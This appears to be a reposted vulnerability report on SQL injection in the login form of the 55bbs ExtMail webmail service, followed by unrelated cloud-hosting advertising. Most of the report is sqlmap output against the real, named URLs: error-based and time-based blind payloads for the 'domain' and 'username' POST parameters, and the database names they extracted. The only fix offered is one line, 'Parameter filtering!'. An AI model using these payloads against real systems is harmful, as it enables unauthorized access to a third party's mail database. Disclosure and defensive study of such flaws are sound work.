55bbs email system SQL injection requires parameter Filtering
55bb mail system SQL Injection injection link: http://pop3.55bbs.com/extmail/cgi/index.cgihttp://smtp.55bbs.com/extmail/cgi/index.cgi Injection Parameter: domain (POST) Type: error-basedTitle: MySQL> = 5.0 AND error-based-WHERE, HAVING, order by or group by clausePayload: username = admin & password = 2121 & domain = 55bbs.com 'AND (SELECT 2116 FROM (select count (*), CONCAT (0x7162716a71, (SELECT (ELT (2116 = 2116, 1 ))), 0x71787a6b71, FLOOR (RAND (0) * 2) x FROM INFORMATION_SCHEMA.CHARACTER_SETS group by x) a) AND 'mtie '= 'mtie & nosameip = onParameter: username (POST) Type: error-basedTitle: MySQL> = 5.0 AND error-based-WHERE, HAVING, order by or group by clausePayload: username = admin' AND (SELECT 8134 FROM (select count (*), CONCAT (0x7162716a71, (SELECT (ELT (8134 = 8134,1), 0x71787a6b71, FLOOR (RAND (0) * 2) x FROM INFORMATION_SCHEMA.CHARACTER_SETS group by x)) AND 'thua '= 'thua & password = 2121 & domain = 55bbs.com & nosameip = onType: AND/OR time-based blintitle: MySQL> = 5.0.12 AND time-based blind (SELECT) payload: username = admin' AND (SELECT * FROM (SELECT (SLEEP (5) XEQZ) AND 'dgqg' = 'dgqg & password = 2121 & domain = 55bbs.com & nosameip = on
Parameter: domain (POST) Type: error-basedTitle: MySQL> = 5.0 AND error-based-WHERE, HAVING, order by or group by clausePayload: username = admin & password = 2121 & domain = 55bbs.com 'AND (SELECT 3084 FROM (select count (*), CONCAT (0x7170767671, (SELECT (ELT (3084 = 3084,1), 0x716b627671, FLOOR (RAND (0) * 2) x FROM INFORMATION_SCHEMA.CHARACTER_SETS group by x)) AND 'ekhn '= 'ekhn & nosameip = onType: AND/OR time-based blintitle: MySQL> = 5.0.12 AND time-based blind (SELECT) Payload: username = admin & password = 2121 & domain = 55bbs.com 'AND (SELECT * FROM (SELECT (SLEEP (5) LJhz) AND 'vps' = 'vps' & nosameip = onParameter: username (POST) Type: error-basedTitle: MySQL> = 5.0 AND error-based-WHERE, HAVING, order by or group by clausePayload: username = admin' AND (SELECT 7724 FROM (select count (*), CONCAT (0x7170767671, (SELECT (ELT (7724 = 7724,1), 0x716b627671, FLOOR (RAND (0) * 2) x FROM INFORMATION_SCHEMA.CHARACTER_SETS group by x) a) AND 'aqvk' = 'aqvk & password = 2121 & domain = 55bbs.com & nosameip = onType: AND/OR time-based blintitle: MySQL> = 5.0.12 AND time-based blind (SELECT) Payload: username = admin' AND (SELECT * FROM (SELECT (SLEEP (5 ))) gwoO) AND 'ezmf '= 'ezmf & password = 2121 & domain = 55bbs.com & nosameip = on --- there were multiple injection points, please select the one to use for following injections: [0] place: POST, parameter: domain, type: Single quoted string (default) [1] place: POST, parameter: username, type: single quoted string [q] Quit> 0 [17:03:12] [INFO] the back-end DBMS is MySQLweb application technology: Nginxback-end DBMS: mySQL 5.0 [17:03:12] [INFO] fetching database names [17:03:12] [INFO] the SQL query used returns 3 entries [17:03:12] [INFO] resumed: information_schema [17:03:12] [INFO] resumed: extmail [17:03:12] [INFO] resumed: testavailable databases [3]: [*] extmail [*] information_schema [*] test
Solution:
Parameter filtering!
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
